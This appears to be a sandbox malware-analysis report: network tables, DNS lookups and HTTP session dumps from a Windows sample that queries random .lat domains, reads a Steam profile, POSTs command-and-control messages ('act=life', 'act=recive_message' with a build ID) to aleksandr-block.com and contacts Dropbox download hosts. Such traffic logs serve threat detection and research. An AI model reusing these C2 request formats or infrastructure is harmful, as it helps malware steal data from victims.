                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:42.154207945 CET44349860188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:42.264646053 CET49876443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:42.264691114 CET44349876188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:42.264940023 CET49876443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:42.265285015 CET49876443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:42.265295029 CET44349876188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:42.730792046 CET44349876188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:42.730989933 CET49876443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:42.732440948 CET49876443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:42.732449055 CET44349876188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:42.732790947 CET44349876188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:42.735028982 CET49876443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:42.735100031 CET49876443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:42.735116005 CET44349876188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:43.203238964 CET44349876188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:43.203396082 CET44349876188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:43.203509092 CET49876443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:43.204217911 CET49876443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:43.204240084 CET44349876188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:43.204251051 CET49876443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:43.204256058 CET44349876188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:43.214541912 CET49883443192.168.2.7162.125.66.18
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:43.214580059 CET44349883162.125.66.18192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:43.214684963 CET49883443192.168.2.7162.125.66.18
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:43.215094090 CET49883443192.168.2.7162.125.66.18
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:43.215110064 CET44349883162.125.66.18192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:43.859853029 CET44349883162.125.66.18192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:43.859967947 CET49883443192.168.2.7162.125.66.18
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:43.862529993 CET49883443192.168.2.7162.125.66.18
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:43.862545013 CET44349883162.125.66.18192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:43.863049030 CET44349883162.125.66.18192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:43.864151001 CET49883443192.168.2.7162.125.66.18
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:43.907362938 CET44349883162.125.66.18192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:44.686580896 CET44349883162.125.66.18192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:44.686659098 CET44349883162.125.66.18192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:44.686676979 CET49883443192.168.2.7162.125.66.18
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:44.686712980 CET49883443192.168.2.7162.125.66.18
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:44.712415934 CET49883443192.168.2.7162.125.66.18
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:44.712449074 CET44349883162.125.66.18192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:44.712485075 CET49883443192.168.2.7162.125.66.18
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:44.712492943 CET44349883162.125.66.18192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:44.950932980 CET49897443192.168.2.7162.125.66.15
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:44.950948000 CET44349897162.125.66.15192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:44.951212883 CET49897443192.168.2.7162.125.66.15
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:44.953493118 CET49897443192.168.2.7162.125.66.15
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:44.953507900 CET44349897162.125.66.15192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:45.745389938 CET44349897162.125.66.15192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:45.745486975 CET49897443192.168.2.7162.125.66.15
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:45.745496035 CET44349897162.125.66.15192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:45.745543003 CET49897443192.168.2.7162.125.66.15
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:45.747565985 CET49897443192.168.2.7162.125.66.15
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:45.747571945 CET44349897162.125.66.15192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:45.747909069 CET44349897162.125.66.15192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:45.749159098 CET49897443192.168.2.7162.125.66.15
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:45.795326948 CET44349897162.125.66.15192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:46.055651903 CET44349897162.125.66.15192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:46.099340916 CET49897443192.168.2.7162.125.66.15
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:46.099360943 CET44349897162.125.66.15192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:46.099858999 CET49897443192.168.2.7162.125.66.15
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:46.099873066 CET44349897162.125.66.15192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:46.099905014 CET49897443192.168.2.7162.125.66.15
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:46.100090027 CET44349897162.125.66.15192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:46.100127935 CET44349897162.125.66.15192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:46.100189924 CET49897443192.168.2.7162.125.66.15
                                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:29.501594067 CET5392653192.168.2.71.1.1.1
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:29.510795116 CET53539261.1.1.1192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:29.512052059 CET6041853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:29.522290945 CET53604181.1.1.1192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:29.525032043 CET5385353192.168.2.71.1.1.1
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:29.534229040 CET53538531.1.1.1192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:29.536919117 CET5081753192.168.2.71.1.1.1
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:29.552645922 CET53508171.1.1.1192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:29.555067062 CET5502053192.168.2.71.1.1.1
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:29.563430071 CET53550201.1.1.1192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:29.565601110 CET6376453192.168.2.71.1.1.1
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:29.574287891 CET53637641.1.1.1192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:29.576397896 CET5712253192.168.2.71.1.1.1
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:29.585757017 CET53571221.1.1.1192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:29.590692997 CET6394953192.168.2.71.1.1.1
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:29.598948956 CET53639491.1.1.1192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:29.601252079 CET5529353192.168.2.71.1.1.1
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:29.607922077 CET53552931.1.1.1192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:31.066282034 CET6287553192.168.2.71.1.1.1
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:31.252180099 CET53628751.1.1.1192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:43.206079006 CET6049553192.168.2.71.1.1.1
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:43.213665962 CET53604951.1.1.1192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:44.916032076 CET6197153192.168.2.71.1.1.1
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:44.931713104 CET53619711.1.1.1192.168.2.7
                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:29.501594067 CET192.168.2.71.1.1.10x5700Standard query (0)shoefeatthe.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:29.512052059 CET192.168.2.71.1.1.10xa7b7Standard query (0)bloodyswif.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:29.525032043 CET192.168.2.71.1.1.10x5795Standard query (0)washyceehsu.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:29.536919117 CET192.168.2.71.1.1.10x4e2Standard query (0)leggelatez.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:29.555067062 CET192.168.2.71.1.1.10x32a5Standard query (0)miniatureyu.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:29.565601110 CET192.168.2.71.1.1.10xca1eStandard query (0)kickykiduz.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:29.576397896 CET192.168.2.71.1.1.10x1dbaStandard query (0)savorraiykj.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:29.590692997 CET192.168.2.71.1.1.10xdac0Standard query (0)finickypwk.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:29.601252079 CET192.168.2.71.1.1.10x9665Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:31.066282034 CET192.168.2.71.1.1.10x1b5fStandard query (0)aleksandr-block.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:43.206079006 CET192.168.2.71.1.1.10x7adeStandard query (0)www.dropbox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:44.916032076 CET192.168.2.71.1.1.10xb0a4Standard query (0)ucc3847efbfdc5176cc975eba0f9.dl.dropboxusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:16.872656107 CET1.1.1.1192.168.2.70xd1a7No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:16.872656107 CET1.1.1.1192.168.2.70xd1a7No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:29.510795116 CET1.1.1.1192.168.2.70x5700Name error (3)shoefeatthe.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:29.522290945 CET1.1.1.1192.168.2.70xa7b7Name error (3)bloodyswif.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:29.534229040 CET1.1.1.1192.168.2.70x5795Name error (3)washyceehsu.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:29.552645922 CET1.1.1.1192.168.2.70x4e2Name error (3)leggelatez.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:29.563430071 CET1.1.1.1192.168.2.70x32a5Name error (3)miniatureyu.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:29.574287891 CET1.1.1.1192.168.2.70xca1eName error (3)kickykiduz.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:29.585757017 CET1.1.1.1192.168.2.70x1dbaName error (3)savorraiykj.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:29.598948956 CET1.1.1.1192.168.2.70xdac0Name error (3)finickypwk.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:29.607922077 CET1.1.1.1192.168.2.70x9665No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:31.252180099 CET1.1.1.1192.168.2.70x1b5fNo error (0)aleksandr-block.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:31.252180099 CET1.1.1.1192.168.2.70x1b5fNo error (0)aleksandr-block.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:43.213665962 CET1.1.1.1192.168.2.70x7adeNo error (0)www.dropbox.comwww-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:43.213665962 CET1.1.1.1192.168.2.70x7adeNo error (0)www-env.dropbox-dns.com162.125.66.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:44.931713104 CET1.1.1.1192.168.2.70xb0a4No error (0)ucc3847efbfdc5176cc975eba0f9.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:44.931713104 CET1.1.1.1192.168.2.70xb0a4No error (0)edge-block-www-env.dropbox-dns.com162.125.66.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  • steamcommunity.com
                                                                                                                                                                                                                                                  • aleksandr-block.com
                                                                                                                                                                                                                                                  • www.dropbox.com
                                                                                                                                                                                                                                                  • ucc3847efbfdc5176cc975eba0f9.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  0192.168.2.749784104.102.49.2544437532C:\Users\user\Desktop\yTRd6nkLWV.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-01-14 07:55:30 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: steamcommunity.com
                                                                                                                                                                                                                                                  2025-01-14 07:55:30 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                                  Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Date: Tue, 14 Jan 2025 07:55:30 GMT
                                                                                                                                                                                                                                                  Content-Length: 35141
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: sessionid=207508de5b63d2f8b6c628c5; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                  Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                  2025-01-14 07:55:30 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                                                  2025-01-14 07:55:31 UTC16384INData Raw: 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a
                                                                                                                                                                                                                                                  Data Ascii: eamcommunity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">
                                                                                                                                                                                                                                                  2025-01-14 07:55:31 UTC3768INData Raw: 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22
                                                                                                                                                                                                                                                  Data Ascii: </a></div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="
                                                                                                                                                                                                                                                  2025-01-14 07:55:31 UTC510INData Raw: 61 6e 6b 22 3e 53 74 65 61 6d 20 53 75 62 73 63 72 69 62 65 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22
                                                                                                                                                                                                                                                  Data Ascii: ank">Steam Subscriber Agreement</a> &nbsp;| &nbsp;<a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  1192.168.2.749795188.114.96.34437532C:\Users\user\Desktop\yTRd6nkLWV.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-01-14 07:55:31 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Content-Length: 8
                                                                                                                                                                                                                                                  Host: aleksandr-block.com
                                                                                                                                                                                                                                                  2025-01-14 07:55:31 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                  Data Ascii: act=life
                                                                                                                                                                                                                                                  2025-01-14 07:55:32 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Tue, 14 Jan 2025 07:55:32 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=9qd915e1jk944hbqif3cjsh2cd; expires=Sat, 10 May 2025 01:42:11 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lU9u7VFaA5Dzk3cXQ4sRDooIJowP3mnH%2F0RBL2HnjzZTdlrydZdyfQxStQd5sj9jDinA385Ex5CjLD1%2BdzSIYovsWFw5ajJvqSeanZ9X9yoIWhB674GSaIYp1o%2FV8potDGo2X5DB"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 901c1073cdf27cfc-EWR
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2027&min_rtt=2026&rtt_var=763&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=910&delivery_rate=1432074&cwnd=223&unsent_bytes=0&cid=8e45eb0d83bcec91&ts=454&x=0"
                                                                                                                                                                                                                                                  2025-01-14 07:55:32 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 2ok
                                                                                                                                                                                                                                                  2025-01-14 07:55:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  2192.168.2.749801188.114.96.34437532C:\Users\user\Desktop\yTRd6nkLWV.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-01-14 07:55:32 UTC267OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Content-Length: 45
                                                                                                                                                                                                                                                  Host: aleksandr-block.com
                                                                                                                                                                                                                                                  2025-01-14 07:55:32 UTC45OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 42 62 4c 37 4b 6b 2d 2d 30 34 53 26 6a 3d
                                                                                                                                                                                                                                                  Data Ascii: act=recive_message&ver=4.0&lid=BbL7Kk--04S&j=
                                                                                                                                                                                                                                                  2025-01-14 07:55:33 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Tue, 14 Jan 2025 07:55:33 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=p5ak2c113pej3c2sm8615osh94; expires=Sat, 10 May 2025 01:42:11 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                  vary: accept-encoding
